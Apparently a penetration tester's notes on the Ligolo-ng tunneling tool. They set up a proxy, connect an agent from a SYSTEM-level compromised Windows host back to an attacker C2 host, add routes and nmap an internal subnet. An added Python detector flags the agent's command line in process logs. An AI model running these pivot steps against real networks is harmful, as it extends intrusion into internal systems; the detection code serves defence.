Ligolo-ng
An advanced, yet simple, tunneling tool that uses TUN interfaces.
https://github.com/nicocha30/ligolo-ng
Starting Ligolo
You should transfer an agent client to your target machine.
Setting up a NIC
When using Linux, you need to create a tun interface on the Proxy Server (C2):
#sudo ip tuntap add user [your_username] mode tun ligolo
#sudo ip link set ligolo up
Kali> sudo ip tuntap add user iptracej mode tun ligolo
Kali> sudo ip link set ligolo up
Kali> ifconfig
Starting a Proxy
# ./proxy -h # Help options
Kali> proxy -selfcert
Starting an Agent
# $ ./agent -connect attacker_c2_server.com:11601
CMD> .\agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert
Proxy Operation
# INFO[0102] Agent joined. name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.100.2:49719"
Use the 'session' command to select the agent. You can select a session number here.
#ligolo-ng » session
#? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.100.2:49719
Use the 'ifconfig' command to list the agent's network interfaces.
#[Agent : NT AUTHORITY\SYSTEM@MS01] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0 │
├──────────────┬────────────────────────────────┤
│ Name │ Ethernet0 │
│ Hardware MAC │ 00:0c:29:3c:a0:bb │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.100.2/24 │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1 │
├──────────────┬────────────────────────────────┤
│ Name │ Ethernet1 │
│ Hardware MAC │ 00:0c:29:3c:a0:c5 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 10.10.1.2/24 │
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 2 │
├──────────────┬───────────────────────────────┤
│ Name │ Loopback Pseudo-Interface 1 │
│ Hardware MAC │ │
│ MTU │ -1 │
│ Flags │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128 │
│ IPv4 Address │ 127.0.0.1/8 │
└──────────────┴───────────────────────────────┘
Add a route to your target network
Kali> sudo ip route add 10.10.1.0/24 dev ligolo
Kali> ip route
# Remove the route
# Kali> sudo ip route del 10.10.1.0/24 dev ligolo

Start tunnel
#[Agent : NT AUTHORITY\SYSTEM@MS01] » start
#[Agent : NT AUTHORITY\SYSTEM@MS01] » INFO[1113] Starting tunnel to NT AUTHORITY\SYSTEM@MS01
Kali Commands
ping -c 2 <internal machine>
nmap -sC -sV <internal machine>
...
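Detecting the agent from process-creation logs
The agent command line shown under "Starting an Agent" is what a defender sees in process-creation telemetry, and the binary name is the least reliable part of it. The following is an added example, not part of the original notes or of the ligolo-ng project: it scores logged command lines on the argument pattern alone. The sample events, the scoring thresholds and the assumption that the agent accepts Go-style flag spellings (-flag, --flag, -flag=value) are this example's own.

```python
import shlex

DEFAULT_PORT = "11601"                   # port in this page's -connect examples
SIGNAL_FLAGS = ("ignore-cert", "retry")  # optional flags from the page's agent command

def parse_args(cmdline):
    """Map flag name -> value (or True) for one logged command line.

    Accepts -flag, --flag, -flag=value and -flag value (assumed Go flag syntax).
    """
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                               # unbalanced quote in the log
        tokens = cmdline.split()
    args, i = {}, 1                                  # tokens[0] is the image path
    while i < len(tokens):
        name, sep, value = tokens[i].lstrip("-").partition("=")
        if tokens[i].startswith("-") and name:
            if not sep and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                i += 1
                value = tokens[i]
            args[name.lower()] = value or True
        i += 1
    return args

def classify(cmdline):
    """Return 'high', 'medium' or None; the binary name is never consulted."""
    args = parse_args(cmdline)
    target = args.get("connect")
    if not isinstance(target, str) or ":" not in target:
        return None                                  # no -connect host:port at all
    signals = sum(flag in args for flag in SIGNAL_FLAGS)
    signals += target.rsplit(":", 1)[1] == DEFAULT_PORT
    return "high" if signals >= 2 else "medium" if signals == 1 else None

# Constructed process-creation command lines (not captured from a real host).
SAMPLE_EVENTS = [
    r".\agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert",
    r"C:\Users\Public\updater.exe --connect=10.0.0.5:443 -ignore-cert",
    "openssl s_client -connect example.com:443",
]

def scan(events):
    """Return (verdict, cmdline) for every event that raised a verdict."""
    return [(v, e) for e in events if (v := classify(e))]

if __name__ == "__main__":
    for verdict, event in scan(SAMPLE_EVENTS):
        print(f"{verdict:6} {event}")
```

A bare -connect host:port is not flagged on its own because legitimate tools such as openssl s_client use the same flag; the verdict comes from its combination with certificate-validation bypass, retry behaviour or the default port.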